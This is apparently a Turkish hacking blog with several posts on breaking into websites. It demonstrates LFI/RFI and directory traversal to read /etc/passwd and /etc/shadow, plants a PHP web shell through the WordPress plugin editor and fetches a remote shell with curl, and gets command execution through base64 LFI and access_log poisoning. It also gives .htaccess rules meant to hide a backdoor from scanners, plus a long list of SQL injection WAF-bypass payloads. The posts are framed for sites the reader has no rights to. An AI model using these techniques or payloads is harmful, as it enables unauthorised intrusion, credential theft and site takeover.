Newest Post

Arbitrary File Download nedir


Adından da anlaşılacağı gibi, sistem yöneticileri sistemde gereken önlemleri 
Almazlarsa kötü niyetli herhangi bir kullanıcı sunucudan hassas dosyaları indirmek İçin bu güvenlik açığından yararlanabilir. Birçok web uygulamasında, kullanıcının istediği bir veya daha fazla dosyayı indirebileceği dosya indirme bölümleri vardır.

Örnek verecek olursak 
Download_file (‘/var/www/store_file/’ + params[:filename])

Bu yöntem kullanıcının girişini alır ve değeri filename parametresine atar. Kullanıcı indirmek için dosyaya tıkladığında, filename' parametresini, indirilen dosyaları depolamak için kullanılan 

/var/www/store_file/ dizinine ulaşır

Örneğin, Kullanıcı 'kartal.php' istediğinde, 
yol '/var/www/store_file/kartal.php' olacaktır. Tabi dizide mevcutsa, değilse kullanıcı 'Dosya Bulunamadı' mesajı alır.



LFI / RFI

LFI / RFI, Dosya İndirme güvenlik açığından farklıdır. Ancak, sunucuda dizin geçişi açıksa, ikisi 
birlikte kullanılır

LFI ve RFI, Yerel Dosya Ekleme ve Uzaktan Dosya Ekleme güvenlik açığı anlamına gelir. Her ikisi 

de sömürü biçimi dışında benzer niteliktedir. Her ikisi de, çoğunlukla PHP olan web uygulamaları 

tarafından kullanılan filtrelenmemiş giriş dosyası parametrelerinden yararlanır. LFI, web 

uygulamasının barındırıldığı makinede bulunan herhangi bir yerel dosyayı kullanırken, RFI ise 

URL'leri kullanarak uzaktan barındırılan kötü amaçlı dosyaları içerir.

PHP include işlevi, bir dosya birkaç defa gerektiğinde kullanışlıdır. Bu nedenle, kodu tekrar tekrar 

yazmak yerine, dosyayı include () işlevini kullanarak birçok başka dosyanın içine ekleyebiliriz

[CODE]color.php:
<?php
$color= ‘Red’;
$brand= ‘BMW’;
?>
vehicles.php:
<?php
include ‘color.php’;
echo ” I love $color $brand”; //Prints I love Red BMW
?>[/CODE]

http://örnek.com/vehicles.php?pref=color.php 

burası normal gibi gözüküyor 

http://örnek.com/vehicles.php?pref=../../../../etc/passwd bu

bu şekilde lfı kullanırız 
sistem hesaplarını ve kullanıcı özelliklerini listeleyen passwd dosyasının içeriğini 
yazdıracaktır. 

http://örnek .com/vehicles.php?pref=http://a.com/shell.txt bu şekildede rfı
 kullanılabilir

[IMG] 

Burada, uygulama, kullanıcının belirli bir klasörde

 /user/JBOSS/FINDS/download/ 

dizininde depolanan dosyaları indirmesine izin vermektedir

 ../../../../etc/passwd deniyoruz


[IMG] 

Böylece, yukarıdaki dizini başarıyla atladık ve unix sisteminin passwd dosyasını İndirebildik

[IMG] 

Benzer şekilde ../../../../etc/shadow sağlayarak da 'shadow' dosyasını indirebiliriz. 
'Shadow' dosyası kullanıcı adını ve karşılık gelen şifreli şifreyi içerir

[IMG] 

Ve shadow dosyası indiriliyor.

[IMG] 

Makale alıntıdır yabancı bir kaynaktan çevirdim
merhaba arkadaşlar bugün benim bildiğim sizlerin %99 bilmediği bir yol ile wordpress sistemlerde
komut çalıştırmayı anlatacağım konuyu yabancı bir kayaktan çevirdim
bu şekilde yetki olmayan sitelerde belki işinize yarar

şimdi wordpress yönetici panelinden

pluging>editör


izliyoruz

şimdi herhangi bir pluging seçin 

url şu şekilde oldu

/wp-admin/plugin-editor.php?file=akismet/index.php


şimdi editleyeceğiz


şimdi size vereceğim kodu yapıştırıyorsunuz


Önemli

<pre><?php system($_GET['x'])?></pre>


şimdi

öreksitecom/wp-content/plugins/akismet/?x=

bu şekilde konsol çalıştırabilirsiniz
burdan shellde yükleyebilirsiniz
genelde nginx serverlerde çalışan bi yöntemdir


örnek 

öreksitecom/wp-content/plugins/akismet/?x=dir ​


yaptığınız gibi size içerdekileri gösterir



gördüğünüz gibi gayet pratik bir yöntem

curl shellyüküsitecom/shell.txt -o kartal.php şeklinde komut çalıştırdığınızda kartal.php isminde
shellyüküsitecom/shell.txt sitesindeki shellin yüklü olduğu bir dosya size verecektir​

Merhaba arkadaşlar bugün sizlere 
base64 şeklinde lfı göstereceğim arkadaşlar bazı sitelerde lfı vardır ama işte normal komutlarla onları göremessiniz örnek 
asite/page=/etc/passwd şeklinde göremessinizde asite/page=L2V0Yy9wYXNzd2Q= şeklinde yani base64lenmiş şeklinde denerseniz görürsünüz

şimdi hedef sistem bulduk lfı denemesi yapacağız


gördüğünüz gibi sitede işe yaramadı sade /etc/passwd
peki ne yapacağız hemen hackbarda /etc/passwd base64 çevireceğiz


evet çevirdik L2V0Yy9wYXNzd2Q= şimdi bunu deneyeceğiz 



gördüğünüz gibi okuduk arkadaşlar şimdi /proc/self/environ bakalım 
shell yüklemek için



şimdi base64 çeviriyoruz




gördüğünüz gibi okuduk



şimdi burp ile user agent kısmına payloadımızı yapıştırıyoruz

payload için tıkla

şimdi forward yapıyoruz payloadı yüklüyoruz şimdi

https://s7.dosya.tc/server14/qmx5ig/payload.txt.html




gördüğünüz gibi payload kartal.php base64 çevirdik şimdi shell yükleyelim


gördüğünüz gibi shell yükledik gördüğünüz gibi arkadaşlar sheldeki işlemlerde hata alırsanız base64 çevirmeniz yeterli


şunuda söylüyeyim arkadaşlar belki bu metotlarla çok ilgilenmiyorsunuz
ama şöyle birşey var bu deneme yaptığım sitenin alexa değeri globalde 105 bin Ayyıldız timin global alexsası 132 bin siz düşünün



alexa gördüğünüz gibi



Merhaba arkadaşlar bugün sizlere ​

siteleri access_log inject ederek lfı siteleri rfı çevirmeyi anlatacağım rfı çevirmekten kastım komut çalıştırmak


sitemizi bulduk arkadaşlar şimdi sitede lfı varmı kontrol ediyoruz


../../../../../../../../../../../../../../../etc/passwd denedik ama olmadı arkadaşlar 


şimdi sonuna ekleyerek bypasslıyoruz yani şu şekilde 
../../../../../../../../../../../../../../../etc/passwd


şimdi access_logun dizinini bulmak için /etc/httpd/conf/httpd.conf yapıyoruz 
ve ctrl+u yapıyoruz ve kendi sitemizi kaynak kodlarında arıyoruz



gördüğünüz gibi 1523 satırda access_log dizini bulduk dizini /home/pro_99/null.com/access_log
1513 satıra bakacak olursak 12.34.5.678:80 (12.34.5.678 temsilidir) server ip ve 80 portunu görüyoruz bu port işimize yarayacak bir kaç adım sonra



şimdi size bi perl script vereceğim onla siteye inject edeceğiz

perl scriptadı.pl hedef.com 80
burdaki 80 daha önce serverde vardı :80 şeklinde buraya serverde açık herangi portu girebilirsiniz
script indir --> http://link.tl/2hVQE


şimdi siteye gidin ve ../../../../../../../../../../../../../../../home/pro_99/null.com/access_log
girin ekranda v0pcr3w arayın eğer ordaysa başarılı olmuş demektir 


sitede ../../../../../../../../../../../../../../../home/pro_99/null.com/access_log&cmd= şeklinde artık komut çalıştırabilirsiniz ben id komutuna bakacağım çalışıp çalışmadığını görün diye yukarda gördüğünüz gibi çalışıyor



istediğiniz bir konu veya sorunuz varsa yorum yapın


comment if you have a topic or question you want


merhabalar bugün sizlere websitenizi .htaccess editleyere bazı saldırılardan korunmayı ve sitenizi güvenliği için bir kaç yoldan bahsedeceğim


.htaccess (hypertext access file) 

Genelde Sunucunun Ana dizininde olan
Adı olmayan Ayarlar Uygulamalar Yapışan Dosyadır. Güvenlik ,Yetki, Düzenleme, Ayar, kısıtlama vb.
işlemleri yapabiliyoruz.
bu gün Biz Sadece Güvenliğin Bir kısmını Ele Alacağız .



Scannerlardan korunma


örnek bi sitenin içindesiniz çok önemli bir site
siteye backdoor bıraktınız bide shell bunu bulmamaları içinde bunu kullanabilirsiniz

bu alacağımız önlem sayesinde Acunetix,sqlmap,nikto gibi 
Scannerlardan korunmamızı sağlıyor bunu yapmak için .htaccess dosyamızın ana dizinde olması lazım .
bunu web scannerlere göre editleyebilirsiniz



RewriteEngine On[/B][/B][/COLOR][/SIZE][/CENTER]
[SIZE=4][COLOR=#000000][B]
[CENTER][B]
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_USER_AGENT} Acunetix [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dirbuster [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jbrofuzz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webshag [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nikto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} SF [OR]
RewriteCond %{HTTP_USER_AGENT} sqlmap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} fimap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nessus [NC,OR]
RewriteCond %{HTTP_USER_AGENT} whatweb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Openvas [NC,OR]
RewriteCond %{HTTP:Acunetix-Product} ^WVS
RewriteRule ^.* http://127.0.0.1/ [R=301,L]
</IfModule> 



sql injection Engelleme


günümüzün en popiler açıklarından biri sql injection her sistemde olabilir nerdeyse bütün ülkelerin sitelerinde mevcut bir açık eğer sizin sitenizde sql açığı varsa ve bunun nasıl giderileceğini bilmiyorsanız en azından .htaccess dosyası ile bunu bi nebze önleyebilirsiniz ama şunu söylemekte fayda var buda kesin bir çözüm değil
bunu yapmak için .htaccess dosyamızın ana dizinde olması lazım .


RewriteEngine On[/SIZE][/COLOR][/B][/B][/B][/CENTER]
[B][B][B][COLOR=rgb(0, 0, 0)][SIZE=4]
[CENTER]RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK) [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)(<|>|’|%0A|%0D|’|<|>|).* [NC,OR]
RewriteCond %{REQUEST_URI} ^/(,|;|<|>|/{2,999}).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(java|curl|wget).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(libwww|curl|wget|python|scan).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(<|>|’|%0A|%0D|’|<|>|).* [NC,OR]
RewriteCond %{HTTP_COOKIE} ^.*(<|>|’|%0A|%0D|’|<|>|).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(localhost|loopback|127\\.0\\.0\\.1).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(<|>|’|%0A|%0D|’|<|>|).* [NC,OR]
RewriteCond %{QUERY_STRING} [^a-z](|order|union|declare|char|set|cast|convert|delete|drop|exec|insert|meta|script|select|truncate|update)[^a-z] [NC]
RewriteRule (.*) - [F]



XSS engelleme 


xss açığını biliyorsunuzdur bu açığı kesin olarak kapatmak için .htaccess editleyebilirz
şimdi bu ne işe yarayacak saldırgan siteye xss denerse hata ile karşılaşacak
örnek 

index.php?id=<script>alert(’Red’)</script>

yaptığımız anda 403 hatası verecektir.


RewriteEngine On[/B][/CENTER][/B][/CENTER]
[B]
[CENTER][B][CENTER]RewriteCond %{QUERY_STRING} base64_encode.*\\(.*\\) [OR]
RewriteCond %{QUERY_STRING} (\\<|<).*script.*(\\>|>) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\\[|\\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\\[|\\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php|forum.php|yaz.php [F,L]



websitesi erişim kapatma


örneğin bi websitesiniz var ve siz bu websitesinin a hack forumunda paylaşıldığını 
gördünüz sitenizi o siteden gelenlere kapatmak için


<Files ~ "^.(htaccess|htpasswd)$">[/SIZE][/COLOR][/B][/CENTER]
[B][COLOR=rgb(0, 0, 0)][SIZE=5]
[CENTER]deny from all
</Files>
order deny,allow
deny from ahackforumu.com
allow from 192.168.1.1
allow from http://google.com


allow from yazarak izin verip 
denny from yazarak engellye biliriz .



ülkelere erişim kapatma


örnek burda IPCountry TR yaparak siteyi TR'den gelenlere kapadık 


SetEnvIf CF-IPCountry TR BuzzOff=1[/B][/CENTER]
[B]
[CENTER]Order allow,deny
Allow from all
Deny from env=BuzzOff

ORDER BY


/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/


UNION SELECT



/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+


information_schema.tables 



/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table


Concat



CoNcAt()
concat()
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))


Group Concat


/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)





istediğiniz bir konu veya sorunuz varsa yorum yapın

comment if you have a topic or question you want

WAF BYPASS ÇEŞİTLERİ

23 Haziran 2019 Pazar
Tag :, Tag :, Tag :
zone-h tool
http://link.tl/2hEgD


zone-h tools

22 Haziran 2019 Cumartesi
Tag :, Tag :, Tag :

// Copyright © WELCOME Se☪uЯity Candidate //Anime-Note//Powered by Blogger // Designed by Johanes Djogan //